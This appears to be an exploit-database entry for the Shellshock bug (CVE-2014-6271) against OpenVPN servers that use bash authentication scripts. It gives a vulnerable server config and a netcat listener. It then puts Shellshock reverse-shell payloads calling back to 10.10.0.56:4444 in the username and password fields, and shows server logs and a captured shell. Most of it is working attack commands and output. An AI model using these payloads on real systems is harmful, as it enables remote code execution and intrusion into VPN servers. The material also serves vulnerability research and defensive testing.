# Exploit Title: ShellShock OpenVPN Exploit
# Date: Fri Oct 3 15:48:08 EDT 2014
# Exploit Author: hobbily AKA @fj33r
# Version: 2.2.29
# Tested on: Debian Linux
# CVE : CVE-2014-6271
#Probably should of submitted this the day I tweeted it. ### server.conf port 1194 proto udp dev tun client-cert-not-required auth-user-pass-verify /etc/openvpn/user.sh via-env tmp-dir "/etc/openvpn/tmp" ca ca.crt cert testing.crt key testing.key # This file should be kept secret dh dh1024.pem server 10.8.0.0 255.255.255.0 keepalive 10 120 comp-lzo user nobody group nogroup persist-key persist-tun client-cert-not-required plugin /usr/lib/openvpn/openvpn-auth-pam.so login script-security 3 status openvpn-status.log verb 3
### user.sh #!/bin/bash echo "$username" echo "$password"
### start server openvpn server.con
### terminal 1 nc -lp 4444
### terminal 2 sudo openvpn --client --remote 10.10.0.52 --auth-user-pass --dev tun --ca ca.cert --auth-nocache --comp-lzo
### username && password were both shellshocked just incase user:() { :;};/bin/bash -i >& /dev/tcp/10.10.0.56/4444 0>&1 & pass:() { :;};/bin/bash -i >& /dev/tcp/10.10.0.56/4444 0>&1 &
### log Mon Sep 29 20:56:56 2014 NOTE: the current --script-security setting may allow this configuration to call user-defined scripts Mon Sep 29 20:56:56 2014 PLUGIN_INIT: POST /usr/lib/openvpn/openvpn-auth-pam.so '[/usr/lib/openvpn/openvpn-auth-pam.so] [login]' intercepted=PLUGIN_AUTH_USER_PASS_VERIFY Mon Sep 29 20:56:56 2014 Diffie-Hellman initialized with 1024 bit key Mon Sep 29 20:56:56 2014 WARNING: POTENTIALLY DANGEROUS OPTION --client-cert-not-required may accept clients which do not present a certificate Mon Sep 29 20:56:56 2014 TLS-Auth MTU parms [ L:1542 D:138 EF:38 EB:0 ET:0 EL:0 ] Mon Sep 29 20:56:56 2014 Socket Buffers: R=[163840->131072] S=[163840->131072] Mon Sep 29 20:56:56 2014 ROUTE default_gateway=10.10.0.1 Mon Sep 29 20:56:56 2014 TUN/TAP device tun0 opened Mon Sep 29 20:56:56 2014 TUN/TAP TX queue length set to 100 Mon Sep 29 20:56:56 2014 do_ifconfig, tt->ipv6=0, tt->did_ifconfig_ipv6_setup=0 Mon Sep 29 20:56:56 2014 /sbin/ifconfig tun0 10.8.0.1 pointopoint 10.8.0.2 mtu 1500 Mon Sep 29 20:56:56 2014 /sbin/route add -net 10.8.0.0 netmask 255.255.255.0 gw 10.8.0.2 Mon Sep 29 20:56:56 2014 Data Channel MTU parms [ L:1542 D:1450 EF:42 EB:135 ET:0 EL:0 AF:3/1 ] Mon Sep 29 20:56:56 2014 GID set to nogroup Mon Sep 29 20:56:56 2014 UID set to nobody Mon Sep 29 20:56:56 2014 UDPv4 link local (bound): [undef] Mon Sep 29 20:56:56 2014 UDPv4 link remote: [undef] Mon Sep 29 20:56:56 2014 MULTI: multi_init called, r=256 v=256 Mon Sep 29 20:56:56 2014 IFCONFIG POOL: base=10.8.0.4 size=62, ipv6=0 Mon Sep 29 20:56:56 2014 Initialization Sequence Completed Mon Sep 29 20:57:54 2014 MULTI: multi_create_instance called Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Re-using SSL/TLS context Mon Sep 29 20:57:54 2014 10.10.0.56:1194 LZO compression initialized Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Control Channel MTU parms [ L:1542 D:138 EF:38 EB:0 ET:0 EL:0 ] Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Data Channel MTU parms [ L:1542 D:1450 EF:42 EB:135 ET:0 EL:0 AF:3/1 ] Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Local Options hash (VER=V4): '530fdded' Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Expected Remote Options hash (VER=V4): '41690919' Mon Sep 29 20:57:54 2014 10.10.0.56:1194 TLS: Initial packet from [AF_INET]10.10.0.56:1194, sid=644ea55a 5f832b02 AUTH-PAM: BACKGROUND: user '() { :;};/bin/bash -i >& /dev/tcp/10.10.0.56/4444 0>&1 &' failed to authenticate: Error in service module Mon Sep 29 20:57:57 2014 10.10.0.56:1194 PLUGIN_CALL: POST /usr/lib/openvpn/openvpn-auth-pam.so/PLUGIN_AUTH_USER_PASS_VERIFY status=1 Mon Sep 29 20:57:57 2014 10.10.0.56:1194 PLUGIN_CALL: plugin function PLUGIN_AUTH_USER_PASS_VERIFY failed with status 1: /usr/lib/openvpn/openvpn-auth-pam.so _________/bin/bash_-i____/dev/tcp/10.10.0.56/4444_0__1__
Mon Sep 29 20:57:57 2014 10.10.0.56:1194 TLS Auth Error: Auth Username/Password verification failed for peer Mon Sep 29 20:57:57 2014 10.10.0.56:1194 Control Channel: TLSv1, cipher TLSv1/SSLv3 DHE-RSA-AES256-SHA Mon Sep 29 20:57:57 2014 10.10.0.56:1194 [] Peer Connection Initiated with [AF_INET]10.10.0.56:1194 Mon Sep 29 20:57:59 2014 10.10.0.56:1194 PUSH: Received control message: 'PUSH_REQUEST' Mon Sep 29 20:57:59 2014 10.10.0.56:1194 Delayed exit in 5 seconds Mon Sep 29 20:57:59 2014 10.10.0.56:1194 SENT CONTROL [UNDEF]: 'AUTH_FAILED' (status=1) Mon Sep 29 20:58:01 2014 read UDPv4 [ECONNREFUSED]: Connection refused (code=111) Mon Sep 29 20:58:04 2014 10.10.0.56:1194 SIGTERM[soft,delayed-exit] received, client-instance exiting
### nc listener nobody@debian:/etc/openvpn$ id id uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) #shoutouts to Fredrik Str�mberg for the post he made on ycombinator
|